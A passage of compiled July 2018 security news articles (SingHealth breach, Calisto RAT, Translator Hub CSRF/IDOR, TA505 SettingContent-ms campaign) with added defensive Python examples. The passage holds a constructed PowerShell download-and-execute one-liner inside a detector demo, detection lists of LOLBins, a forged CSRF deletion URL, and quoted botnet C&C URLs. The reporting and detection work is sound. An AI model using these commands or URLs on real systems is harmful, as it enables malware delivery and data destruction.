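from datetime import datetime, timedelta

# Ports tied to the two router bugs named in the article:
#   37215/tcp  Huawei HG532 UPnP (TR-064 exposed to the WAN), CVE-2017-17215
#   52869/tcp  Realtek SDK UPnP, CVE-2014-8361
WATCHED_PORTS = {
    37215: "CVE-2017-17215 (Huawei HG532)",
    52869: "CVE-2014-8361 (Realtek SDK)",
}

# Assumed log line layout (hypothetical, modelled on iptables LOG output):
#   2018-07-18T21:03:11Z SRC=198.51.100.7 DST=203.0.113.4 PROTO=TCP DPT=37215
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\dZ)\s+SRC=(?P<src>\S+)\s+DST=(?P<dst>\S+)"
    r"\s+PROTO=(?P<proto>\S+)\s+DPT=(?P<dpt>\d+)"
)

def parse_line(line):
    """Return (ts, src, dst, dport) for a well-formed line, else None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return ts, m.group("src"), m.group("dst"), int(m.group("dpt"))

def find_scanners(lines, min_targets=5, window=timedelta(minutes=10)):
    """Flag sources that touch >= min_targets distinct hosts on a watched port
    inside any `window`-long interval. Returns {src: {port: summary}}."""
    hits = defaultdict(list)          # (src, port) -> [(ts, dst), ...]
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue                  # malformed or unrelated line: skip
        ts, src, dst, dport = parsed
        if dport in WATCHED_PORTS:
            hits[(src, dport)].append((ts, dst))

    scanners = defaultdict(dict)
    for (src, dport), events in hits.items():
        events.sort()
        # sliding window over time-ordered events, counting distinct targets
        best, start = 0, 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            best = max(best, len({d for _, d in events[start:end + 1]}))
        if best >= min_targets:
            scanners[src][dport] = {
                "cve": WATCHED_PORTS[dport],
                "targets": best,
                "first": events[0][0],
                "last": events[-1][0],
            }
    return dict(scanners)

# Constructed sample log: one Huawei scanner, one low-volume Realtek prober, noise.
SAMPLE_LOG = """\
2018-07-18T21:03:11Z SRC=198.51.100.7 DST=203.0.113.1 PROTO=TCP DPT=37215
2018-07-18T21:03:12Z SRC=198.51.100.7 DST=203.0.113.2 PROTO=TCP DPT=37215
2018-07-18T21:03:12Z SRC=198.51.100.7 DST=203.0.113.3 PROTO=TCP DPT=37215
2018-07-18T21:03:14Z SRC=198.51.100.7 DST=203.0.113.4 PROTO=TCP DPT=37215
2018-07-18T21:03:15Z SRC=198.51.100.7 DST=203.0.113.5 PROTO=TCP DPT=37215
2018-07-18T21:03:15Z SRC=198.51.100.7 DST=203.0.113.6 PROTO=TCP DPT=37215
2018-07-18T21:04:01Z SRC=192.0.2.50 DST=203.0.113.1 PROTO=TCP DPT=52869
2018-07-18T21:04:02Z SRC=192.0.2.50 DST=203.0.113.2 PROTO=TCP DPT=52869
2018-07-18T21:04:03Z SRC=192.0.2.50 DST=203.0.113.3 PROTO=TCP DPT=52869
2018-07-18T21:05:00Z SRC=192.0.2.9 DST=203.0.113.1 PROTO=TCP DPT=443
this line is not a firewall record and is ignored
"""

if __name__ == "__main__":
    for src, ports in find_scanners(SAMPLE_LOG.splitlines()).items():
        for port, info in ports.items():
            print(f"{src} hit {info['targets']} hosts on {port}: {info['cve']}")
```

The threshold is deliberately a count of distinct destinations rather than packets: a single NAT gateway retrying one connection should not trip it, while a bot working through an address range does. On a CPE fleet the right response to a hit is to confirm the ports are not reachable from the WAN at all, since TR-064 has no business answering Internet-side requests.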

Below are the md5 hash and the C&C associated with the threat:

Ankit Anubhav
@ankit_anubhav
The attacker Anarchy has shared a list of infected victim IPs which at that point, I am not making public for obvious reasons. The bin in his botnet md5 >
c3cf80d13a04996b68d7d20eaf1baea8

As one can see, it uses only 1 exploit, 2017-17215. 2/n pic.twitter.com/F5BNNbf3bM

8:27 PM - Jul 18, 2018

SMII Mondher
@smii_mondher
Ketashi botnet
hxxp://104.244.72.82
hxxp://104.244.72.82/sister
hxxp://104.244.72.82/k
http://104.244.72.82/gpon#ketashi @360Netlab @ankit_anubhav @campuscodi

4:17 PM - Jul 19, 2018


SingHealth, largest healthcare group in Singapore, suffered a massive data breach
22.7.2018 securityaffairs  Incident

SingHealth, the largest healthcare group in Singapore, suffered a massive data breach that exposed 1.5 Million patient records.
The largest healthcare group in Singapore, SingHealth, has suffered a massive data breach that exposed the personal information of 1.5 million patients who visited the group’s clinics between May 2015 and July 2018. The stolen records include patients’ names, addresses, gender, race, dates of birth, and National Registration Identity Card (NRIC) numbers.

SingHealth has 42 clinical specialties and a network of 2 hospitals, 5 national specialty centres, 9 polyclinics, and Bright Vision Community Hospital.

According to a data breach notification released by Singapore’s Ministry of Health (MOH), the hackers stole personal information along with ‘information on the outpatient dispensed medicines’ of about 160,000 patients. Data belonging to Singapore’s Prime Minister Lee Hsien Loong and to other ministers were exposed in the security breach.

“About 1.5 million patients who visited SingHealth’s specialist outpatient clinics and polyclinics from 1 May 2015 to 4 July 2018 have had their non-medical personal particulars illegally accessed and copied. The data taken include name, NRIC number, address, gender, race and date of birth. Information on the outpatient dispensed medicines of about 160,000 of these patients was also exfiltrated. The records were not tampered with, i.e. no records were amended or deleted.” reads the data breach notification.

“On 4 July 2018, IHiS’ database administrators detected unusual activity on one of SingHealth’s IT databases. They acted immediately to halt the activity,”

SingHealth Singapore hack

According to Singapore’s authorities, the hackers specifically and repeatedly targeted Prime Minister Lee Hsien Loong’s data.

MOH explained that the data breach is the result of a targeted attack; local media speculate on the involvement of a nation-state actor in the cyber attack.

“Investigations by the Cyber Security Agency of Singapore (CSA) and the Integrated Health Information System (IHiS)[1] confirmed that this was a deliberate, targeted and well-planned cyberattack. It was not the work of casual hackers or criminal gangs.” reads the press release.

Commenting on the cyber attack in a Facebook post published today, Singapore’s Prime Minister declared that the attackers are “extremely skilled and determined” and have “huge resources” to conduct such cyber attacks repeatedly, an attacker profile that matches an APT group.

“I don’t know what the attackers were hoping to find. Perhaps they were hunting for some dark state secret or at least something to embarrass me. If so, they would have been disappointed,” wrote Singapore’s Prime Minister. “My medication data is not something I would ordinarily tell people about, but nothing is alarming in it.”

“Those trying to break into our data systems are extremely skilled and determined. They have huge resources, and never give up trying. Government systems come under attack thousands of times a day. Our goal has to be to prevent every single one of these attacks from succeeding. If we discover a breach, we must promptly put it right, improve our systems, and inform the people affected.”

The good news for Singapore’s citizens is that, according to MOH, the records were not tampered with: none were amended or deleted.

All affected patients will be contacted by the healthcare institution over the next five days.


Trump-Putin Meeting was the root cause of a spike of cyber attacks against Finland
22.7.2018 securityaffairs  BigBrothers

F5 experts observed a spike in the attacks in the days prior to the Trump-Putin meeting on July 16 that was held in Helsinki, Finland.
Important events attract cyber attacks: in June we discussed the Trump-Kim summit and how Singapore, which hosted it, was hit by an unprecedented number of attacks from June 11 to June 12.

At the time most of the cyber attacks originated in Russia.

Let’s analyze the effect in cyberspace of another event, the Trump-Putin meeting held in Helsinki, Finland, a country that historically is not a privileged target of hackers.

The experts pointed out that they have no data to suggest the attacks against Finland were successful.

Once again researchers at security firm F5 analyzed the number of attacks that hit the host country around the summit and made an interesting discovery: most of the cyber attacks originated in China.

“On July 16th, President Trump met with Vladimir Putin in Helsinki, Finland. As expected, attacks against Finland skyrocketed days before the meeting. What’s interesting this time around is that Russia wasn’t the top attacker—perhaps because Trump was meeting with Putin? In this case, China was the top attacker.” reports the security firm F5.

Trump-Putin attacks

Experts observed many similarities between the attacks that hit the countries hosting the two meetings. Hackers targeted the same ports, including SIP port 5060, typically used by VoIP systems (#3 in Finland attacks, #1 in Singapore attacks), SQL port 1433 (#6 in Finland, #3 in Singapore), and Telnet port 23 (#3 in Finland, #9 in Singapore).

Most of the attacks targeted SSH port 22, which is typically used for secure remote administration of Internet of Things (IoT) devices. Attackers scan for devices configured with default credentials and compromise them with brute force attacks.

The second most targeted port was the SMB port 445.

“The challenge is that the device credentials are typically vendor defaults and, as such, are routinely brute forced. The majority of the attacks against Finland surrounding the Trump-Putin meeting were brute force attacks. ” continues F5.

Experts noticed that some ports targeted during the Trump-Putin meeting were not hit during the Singapore summit, for example HTTP port 80, MySQL port 3306, the alternate web server port 8090, often used by web cameras, and RDP port 3389.

Experts highlighted that Finland is not normally included in the list of top-targeted countries.

Which were the other top targeting countries during the Helsinki meeting?

The top targeting countries were

China (29%);
United States (14%);
France (9%);
Italy (8%);
Russia (7%);
According to F5, ChinaNet was the top attacking network during the attack spike.

“If threat actors can follow anyone from an average citizen to a CIA agent, why not President Trump, or any member of his official entourage? They are perhaps the highest valued intelligence targets on the planet right now. Even allied state actors have an interest in gaining eyes or ears into any member of the Trump entourage,” F5 concludes.


Experts discovered Calisto macOS Trojan, the first member of Proton RAT family
22.7.2018 securityaffairs  Apple

Security experts from Kaspersky Lab have discovered a precursor of the infamous Proton macOS malware, which they named Calisto.
Malware researchers from Kaspersky Lab have discovered a malware sample, tracked as Calisto, that appears to be the precursor of the Proton macOS malware.

“We recently came across one such sample: a macOS backdoor that we named Calisto.

The malware was uploaded to VirusTotal way back in 2016, most likely the same year it was created. But for two whole years, until May 2018, Calisto remained off the radar of antivirus solutions, with the first detections on VT appearing only recently.” reads the analysis published by Kaspersky.

“Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:”

The malicious code seems to have been developed in 2016, while Proton was first spotted in 2017.

According to the experts, the malware was uploaded to VirusTotal in 2016 but nobody noticed it until May 2018. Kaspersky has no information about how the threat was propagated; the researchers immediately noticed that some features implemented in Calisto were still under development.

The Calisto installation file is an unsigned DMG image disguised as Intego’s security solution for Mac.

The analysis published by Kaspersky revealed that many features implemented in Proton malware were not present in Calisto.

Proton malware was first discovered in March 2017, when threat actors were offering it for sale on an underground hacking forum for prices ranging from $1,200 to $830,000 for the entire project.

A few weeks later the malware was involved in attacks in the wild for the first time: threat actors hacked the website of the HandBrake app and trojanized the official app with it.

In October 2017 attackers distributed the Proton RAT by poisoning legitimate applications, such as the popular Elmedia Player and the download manager Folx, both developed by Eltima Software.

Both Proton RAT and Calisto are remote access Trojans (RATs) that, once they have infected a system, give the attackers full control over it.

Calisto allows remote control of infected Macs, below some of the features it implements:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
Static analysis conducted by the experts revealed unfinished functionality, including:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS
Experts pointed out that Calisto’s authors did not take into account Apple’s SIP (System Integrity Protection), which had been introduced shortly before the malware was written; for this reason it is not able to bypass it.

“Calisto’s activity on a computer with SIP (System Integrity Protection) enabled is rather limited. Announced by Apple back in 2015 alongside the release of OSX El Capitan, SIP is designed to protect critical system files from being modified — even by a user with root permissions.” researchers explained. “Calisto was developed in 2016 or earlier, and it seems that its creators simply didn’t take into account the then-new technology. However, many users still disable SIP for various reasons; we categorically advise against doing so.”

This means that on a modern macOS version with SIP enabled Calisto’s activity is rather limited; anyway, below are a few recommendations to protect against Calisto, Proton, and similar threats:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software
Currently Calisto appears to have been abandoned by its authors.


Expert discovered it was possible to delete all projects in the Microsoft Translator Hub
22.7.2018 securityaffairs  Security

Microsoft has addressed a serious vulnerability in the Microsoft Translator Hub that could be exploited to delete any or all the projects hosted by the service.
Microsoft has fixed a severe vulnerability in the Microsoft Translator Hub that could be exploited to delete any or all projects hosted by the service.

The Microsoft Translator Hub “empowers businesses and communities to build, train, and deploy customized automatic language translation systems—-”.

The vulnerability was discovered by security expert Haider Mahmood, who was hunting for bugs in the Translator Hub when he found that it was possible to remove a project by manipulating the “projectid” parameter in an HTTP request.

“POST request with no content and parameter in the URL (it’s kinda weird, isn’t it?) the “projectid” parameter in the above request is the ID of the individual project in the database, which in this case is “12839”, by observing the above HTTP request, a simple delete project query could be something like:-” wrote the expert in a blog post.

The expert also discovered a Cross-Site Request Forgery (CSRF) vulnerability that could be used by an attacker to impersonate a legitimate, logged-in user and perform actions on their behalf.

An attacker who knows the ProjectID of a logged-in user just needs to trick the victim into clicking a specially crafted URL that performs the delete action on their behalf. In another scenario the attacker embeds the same URL in a page; once the victim visits it, the project is removed.

“Wait a minute, if you take a look at the Request, first thing to notice is there is no CSRF protection. This is prone to CSRF attack.” continues the expert. “In simple words, CSRF vulnerability allows attacker to impersonate legit logged in user, performing actions on their behalf. Consider this:-

Legit user is logged in.
Attacker includes the URL in a page. (img tag, iframe, lots of possibilities here) “http://hub.microsofttranslator.com/Projects/RemoveProject?projectId=12839”
Victim visits the page, above request will be sent from their browser.
Requirement is that one should know the ProjectID number of logged in victim.
As it has no CSRF protection like anti-CSRF tokens it results in the removal of the project.
Even if it has anti-CSRF protection, here are ways to bypass CSRF token protections.”
Further analysis allowed the expert to discover the worst aspect of the story.

Mahmood discovered an Insecure Direct Object Reference (IDOR) vulnerability, which could be exploited by an attacker to set any ProjectID in the HTTP request used to remove a project.

Theoretically, an attacker can delete all projects in Microsoft Translator Hub by iterating through project IDs starting from 0 to 13000.

“The project whose projectID I used in the HTTP request got deleted. Technically this vulnerability is called Indirect Object Reference. now if I just loop through the values starting from 0 to 13000 (last project), I’m able to delete all projects from the database.” continues the expert. “The vulnerability could have been avoided using simple checks, either the project that the user requested is owned by the same user, associating the project owner with the project is another way, but its Microsoft so….”
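Both bugs come down to two checks missing from a single request handler. The following Python sketch is an added example, not the Translator Hub’s code: it models the vulnerable RemoveProject handler beside a hardened version that requires a per-session CSRF token and verifies that the caller owns the project. The in-memory project table, session store, user names and the project ids other than 12839 (taken from the blog post) are constructed for the demo.

```python
import hmac
import secrets

# Constructed in-memory state (hypothetical, not the Translator Hub's schema):
# project id -> owning user, and session id -> session record.
PROJECTS = {12839: "alice", 12840: "bob", 12841: "alice"}
SESSIONS = {}

class Forbidden(Exception):
    """Raised when a request fails an authorization or CSRF check."""

def login(user):
    """Create a session and bind a fresh, random CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid

def remove_project_vulnerable(session_id, project_id):
    """Models the flawed handler: the only check is 'is there a session?'.
    Any project id is honoured (IDOR), and because nothing request-specific
    is required, a cross-site page can fire the request with the victim's
    cookies (CSRF). Looping project_id from 0 upwards empties the table."""
    if session_id not in SESSIONS:
        raise Forbidden("not logged in")
    return PROJECTS.pop(project_id, None) is not None

def remove_project_hardened(session_id, project_id, csrf_token):
    """The same operation with the two missing checks added."""
    sess = SESSIONS.get(session_id)
    if sess is None:
        raise Forbidden("not logged in")
    # CSRF: the token travels in the request body, not in a cookie, so a
    # third-party page cannot supply it; compare in constant time.
    if not csrf_token or not hmac.compare_digest(
            csrf_token.encode(), sess["csrf"].encode()):
        raise Forbidden("missing or invalid CSRF token")
    # IDOR: the object must belong to the caller. Unknown and foreign ids get
    # the same answer, so the endpoint cannot be used to enumerate projects.
    if PROJECTS.get(project_id) != sess["user"]:
        raise Forbidden("project not found")
    del PROJECTS[project_id]
    return True

def attempt(handler, *args):
    """Run a handler and summarise the outcome as a string."""
    try:
        return "deleted" if handler(*args) else "no such project"
    except Forbidden as exc:
        return f"forbidden: {exc}"

if __name__ == "__main__":
    bob = login("bob")
    # bob deletes alice's project through the vulnerable endpoint ...
    print(attempt(remove_project_vulnerable, bob, 12839))
    # ... but not through the hardened one, even with his own valid token
    print(attempt(remove_project_hardened, bob, 12841, SESSIONS[bob]["csrf"]))
    # a forged request without the token (the CSRF case) is also rejected
    print(attempt(remove_project_hardened, bob, 12840, ""))
    # his own project, with his token, goes through
    print(attempt(remove_project_hardened, bob, 12840, SESSIONS[bob]["csrf"]))
```

In a real web framework the hardened handler would additionally be bound to POST only, so that an `<img>` or `<iframe>` GET cannot reach it at all; the ownership check, not the token, is what stops the 0-to-13000 loop, because a logged-in attacker always has a valid token of his own.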

Microsoft Translator Hub Security Bulletin

Mahmood reported the flaw to Microsoft in late February 2018, and the company addressed it in a couple of weeks.


TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT
22.7.2018 securityaffairs  Virus

Proofpoint uncovered a massive malspam campaign leveraging emails delivering weaponized PDF documents containing malicious SettingContent-ms files.
Security experts from Proofpoint have uncovered a massive malspam campaign, crooks sent hundreds of thousands of emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Experts attributed the malspam campaign to the cybercriminal group tracked as TA505, the attackers are spreading the FlawedAmmyy RAT.

The SettingContent-ms file format was introduced in Windows 10 to allow a user to create “shortcuts” to various Windows 10 settings pages.

The file opens the Control Panel for the user [control.exe]; experts noticed that it includes the <DeepLink> element in the schema.

SettingContent-ms files

This element takes any binary with parameters and executes it, which means an attacker can replace ‘control.exe’ with a malicious command, including cmd.exe or PowerShell, that runs without further user interaction.

“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from Specterops.

“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”

Experts noticed that malicious SettingContent-ms files can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and the detection of OLE-embedded dangerous file formats.

In June experts from SpecterOps observed several campaigns abusing the SettingContent-ms file format within Microsoft Word documents, but only a few days ago Proofpoint experts noticed threat actors leveraging PDF documents.

“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.

“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”

SettingContent-ms files campaign

Once the victim opens the PDF file, Adobe Reader displays a warning asking the user whether they want to open the file, since the PDF attempts to launch the embedded “downl.SettingContent-ms” via JavaScript. Experts noted that the warning is displayed for any file format embedded within a PDF, not only for SettingContent-ms files.

If the victim clicks “OK”, the PowerShell command included in the <DeepLink> element downloads and executes the FlawedAmmyy RAT.
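A defender who wants to catch this chain in mail flow can inspect the two artifacts it relies on: the .SettingContent-ms XML and the PDF that carries it. The following Python is an added example, not SpecterOps’ or Proofpoint’s code: it pulls the <DeepLink> element out of a SettingContent-ms document and reports anything other than an argument-less control.exe or an ms-settings: URI, and it scans raw PDF bytes for an embedded *.SettingContent-ms attachment together with Acrobat JavaScript that launches it. The document skeleton is modelled on the stock Windows control-panel shortcut, the PowerShell one-liner and the PDF fragment are constructed, and example.invalid is a placeholder host.

```python
import re
import xml.etree.ElementTree as ET

# Interpreters and LOLBins that a settings shortcut has no business launching.
SUSPICIOUS_BINARIES = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}
# Argument fragments typical of download-and-execute one-liners.
SUSPICIOUS_ARGS = re.compile(
    r"(https?://|downloadstring|downloadfile|\biex\b|invoke-expression|"
    r"-e(nc|ncodedcommand)?\s|frombase64string|-w(indowstyle)?\s+hidden)", re.I)
# First token of a command line: a quoted path or a run of non-whitespace.
FIRST_TOKEN = re.compile(r'\s*(?:"([^"]+)"|(\S+))')

def deeplink_of(settingcontent_xml):
    """Return the text of the first <DeepLink> element, ignoring namespaces."""
    root = ET.fromstring(settingcontent_xml)
    for el in root.iter():
        if el.tag.rsplit("}", 1)[-1] == "DeepLink":
            return (el.text or "").strip()
    return None

def classify_settingcontent(settingcontent_xml):
    """Return (verdict, reasons). Only an argument-less control.exe or an
    ms-settings: URI is treated as benign; anything else is reported."""
    link = deeplink_of(settingcontent_xml)
    if not link:
        return "malformed", ["missing or empty DeepLink element"]
    m = FIRST_TOKEN.match(link)
    exe = (m.group(1) or m.group(2)).rsplit("\\", 1)[-1].lower()
    args = link[m.end():].strip()
    reasons = []
    if exe in SUSPICIOUS_BINARIES:
        reasons.append(f"DeepLink launches {exe}")
    hit = SUSPICIOUS_ARGS.search(args)
    if hit:
        reasons.append(f"suspicious argument: {hit.group(0).strip()}")
    if exe == "control.exe" and args:
        reasons.append("control.exe invoked with arguments")
    elif exe != "control.exe" and not link.lower().startswith("ms-settings:") and not reasons:
        reasons.append(f"DeepLink target {exe} is not a settings page")
    return ("suspicious" if reasons else "benign"), reasons

def embedded_settingcontent_in_pdf(pdf_bytes):
    """Scan raw PDF bytes for attachments named *.SettingContent-ms and for
    Acrobat JavaScript that launches an attachment (exportDataObject + nLaunch)."""
    names = re.findall(rb"/F\s*\(([^)]*\.settingcontent-ms)\)", pdf_bytes, re.I)
    launches = re.search(rb"exportDataObject\s*\(.*?nLaunch\s*:\s*[12]",
                         pdf_bytes, re.S) is not None
    return [n.decode("latin-1") for n in names], launches

def settingcontent(deeplink):
    """Build a minimal .SettingContent-ms document (shape modelled on the
    stock control-panel shortcut; constructed here for the demo)."""
    return f"""<PCSettings>
  <SearchableContent xmlns="http://schemas.microsoft.com/Search/2013/SettingContent">
    <ApplicationInformation>
      <AppID>windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel</AppID>
      <DeepLink>{deeplink}</DeepLink>
      <Icon>%windir%\\system32\\control.exe</Icon>
    </ApplicationInformation>
  </SearchableContent>
</PCSettings>"""

BENIGN_XML = settingcontent(r"%windir%\system32\control.exe")
MALICIOUS_XML = settingcontent(
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop '
    r'''-c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"''')

# Constructed, uncompressed PDF fragment carrying the attachment and the launcher JS.
SAMPLE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Filespec /F (downl.SettingContent-ms) /EF << /F 2 0 R >> >> endobj
2 0 obj << /Type /EmbeddedFile /Length 13 >> stream
<PCSettings/>
endstream endobj
3 0 obj << /S /JavaScript /JS (this.exportDataObject({cName: "downl.SettingContent-ms", nLaunch: 2});) >> endobj
"""

if __name__ == "__main__":
    print(classify_settingcontent(BENIGN_XML))
    print(classify_settingcontent(MALICIOUS_XML))
    print(embedded_settingcontent_in_pdf(SAMPLE_PDF))
```

Real PDFs usually keep their objects inside FlateDecode streams, so run the byte scan on decompressed streams (or hand the extracted attachment to classify_settingcontent) rather than on the file as it sits on disk; the attachment name check alone is still worth having, because a settings shortcut has no legitimate reason to arrive inside a PDF.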

The FlawedAmmyy RAT has been active since 2016 and borrows code from the Ammyy Admin remote administration tool.

FlawedAmmyy implements common backdoor features: it allows attackers to manage files, capture the screen, remotely control the machine, establish RDP sessions, and much more.

Experts attributed the malspam campaign to the TA505 threat actor based on email messages, as well as the payload.

TA505 operates on a large scale; it was behind other major campaigns leveraging the Necurs botnet to deliver malware such as the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.

“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” concludes Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”


Ecuador to withdraw asylum for Julian Assange in coming weeks or days
22.7.2018 securityaffairs  BigBrothers

According to media, Ecuador is going to hand over the WikiLeaks founder Julian Assange to the UK in “coming weeks or even days.”
In 2012 a British judge ruled that WikiLeaks founder Julian Assange should be extradited to Sweden to face allegations of sexual assault, but Assange received political asylum from Ecuador and has spent the years since in its London embassy.

Now Ecuador is planning to withdraw its political asylum, likely next week; this means that Assange will have to leave the embassy and British authorities will arrest him.

“Sources close to Assange said he himself was not aware of the talks but believed that America was putting ‘significant pressure’ on Ecuador, including threatening to block a loan from the International Monetary Fund (IMF) if he continues to stay at the embassy,” reported RT.

The newly elected President of Ecuador, Lenín Moreno, arrived in London on Friday; officially the purpose of his trip is participation in the Global Disability Summit on 24 July 2018, but media reports suggest he is finalising an agreement with the UK government to withdraw Assange’s asylum protection.

“ECUADOR’S PRESIDENT Lenin Moreno traveled to London on Friday for the ostensible purpose of speaking at the 2018 Global Disabilities Summit (Moreno has been using a wheelchair since being shot in a 1998 robbery attempt). The concealed, actual purpose of the President’s trip is to meet with British officials to finalize an agreement under which Ecuador will withdraw its asylum protection of Julian Assange, in place since 2012, eject him from the Ecuadorian Embassy in London, and then hand over the WikiLeaks founder to British authorities.” wrote Glenn Greenwald on the Intercept.

Glenn Greenwald

@ggreenwald
· 20 Jul
The editor-in-chief of RT says the Ecuadorian government - now highly subservient to the west under @Lenin's government - will withdraw its asylum grant to Julian Assange and hand him over to the UK. People pretending to believe in press freedom will cheer if he's sent to the US: https://twitter.com/M_Simonyan/status/1019958571889577985 …

Glenn Greenwald

@ggreenwald
Which is the greater threat to press freedom: (a) sending Julian Assange to the US to be prosecuted by the Sessions DOJ for publishing classified and hacked docs or (b) Donald Trump tweeting mean insults at Chuck Todd and Wolf Blitzer and being rude to Jim Acosta?

6:05 PM - Jul 20, 2018

Glenn Greenwald

@ggreenwald
The above report that UK & Ecuador are preparing to turn Assange over to UK appears to be true. Big question is whether the US will indict him & seek his extradition, the way Sessions & Pompeo vowed they would. Can't wait to see how many fake press freedom defenders support that.

8:37 PM - Jul 20, 2018
In May 2017, Swedish prosecutors dropped their preliminary investigation into the rape allegation against Julian Assange, but the WikiLeaks founder fears he would be extradited to the US, where he could face federal charges for his role in the Chelsea Manning case.

Julian Assange

Three months ago, Ecuador cut off Assange’s internet access, mainly to prevent him from expressing support for Catalonia in its independence dispute with the Spanish government.

According to Ecuador, Assange had violated the agreement to refrain from interfering in other states’ politics.

Which are current charges against Assange in the UK?

The only criminal proceeding against Assange in the UK is a pending 2012 arrest warrant for “failure to surrender”, which experts consider a minor bail-violation charge.

This charge carries a prison term of three months and a fine, though the time Assange has already spent in prison in the UK could be counted against that sentence.


Microsoft uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates
20.7.2018 securityaffairs  Phishing

Microsoft helped the US government protect at least three 2018 midterm election candidates from attacks by Russian cyberspies.
Microsoft revealed that Russian cyberspies attempted to hack at least three 2018 midterm election candidates, and that it helped the US government repel their attacks.

A Microsoft executive speaking at the Aspen Security Forum revealed the hacking attempts against at least three unnamed congressional candidates; all the attacks were detected this year.

The company executive only added that the three candidates were “people who, because of their positions, might have been interesting targets from an espionage standpoint as well as an election disruption standpoint.”

The hackers sent spear-phishing messages to the candidates, the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website it took it down and helped the US government to “avoid anybody being infected by that particular attack.”

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections,”


Burt compared the recent activities with the hacking campaign conducted to interfere with the 2016 presidential election. He pointed out that, unlike the 2016 campaigns, the 2018 attacks do not target the think tanks and academic experts that were targeted during the 2016 presidential election.

“That does not mean we’re not going to see it, there is a lot of time left before the election,” Burt added.


Thousands of Mega account credentials leaked online, it is credential stuffing
20.7.2018 securityaffairs Incident

Thousands of account credentials associated with the popular file storage service Mega have been published online.
The former NSA hacker Patrick Wardle, co-founder at Digita Security, discovered in June a text file containing over 15,500 usernames, passwords, and file names.

patrick wardle (@patrickwardle) tweeted on Jul 18, 2018:

“😢 Found file on VirusTotal w/ 15K+ Mega accounts (user names/passwords & users' file listings)

😥🤬 File listings included file names describing child abuse content

👮🏽‍♂️🚔🌍 International law enforcement actively engaged

🙏🏽 @zackwhittaker for writeup & collaboration! https://twitter.com/zackwhittaker/status/1018997928793464833 …”

The presence of the file listings suggests that the threat actors who collected the credentials also accessed each account and listed its content.

Wardle discovered the file after it was uploaded to the VirusTotal service some months earlier by a user purportedly in Vietnam.

Wardle passed the data to ZDNet, which verified that the huge trove of data belongs to the Mega service.

ZDNet contacted many users, who confirmed the authenticity of the content of the file.

The data appears to date back to 2013, when Kim Dotcom launched the service.


ZDNet asked the popular expert Troy Hunt, who runs the data breach notification site Have I Been Pwned, to analyze the files.

Hunt believes the hackers collected the credentials from other data breaches (credential stuffing).

98 percent of the addresses in the file had already been included in a previous data breach and were listed in Hunt’s service.

“Some 87 percent of the accounts in the Mega file were found in a massive collection of 2,844 data breaches that he uploaded to the service in February,” said Hunt, according to the post published by ZDNet.

“Of those we contacted, five said that they had used the same password on different sites.”

Mega chairman Stephen Hall also confirmed the file is the result of credential stuffing.

Experts noticed that the Mega service doesn’t implement two-factor authentication, making it easy for attackers to access an account once they obtain its credentials from other breaches.

Mega logs the IP address of each user who accesses an account, and some users confirmed that they noticed suspicious logins to their account from countries in Eastern Europe, Russia, and South America since the file was uploaded.
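The overlap analysis Hunt describes and the post-leak login check, as an added example written for this page (not code from ZDNet, Hunt or Mega): the dump format, the sample accounts, the prior-breach list and the login events are all constructed, and the 80% overlap threshold is an assumed cut-off.

```python
from dataclasses import dataclass
from datetime import datetime


@dataclass(frozen=True)
class LeakedRecord:
    email: str
    password: str
    files: tuple  # file names listed for the account: proof the attacker logged in


def parse_dump(text):
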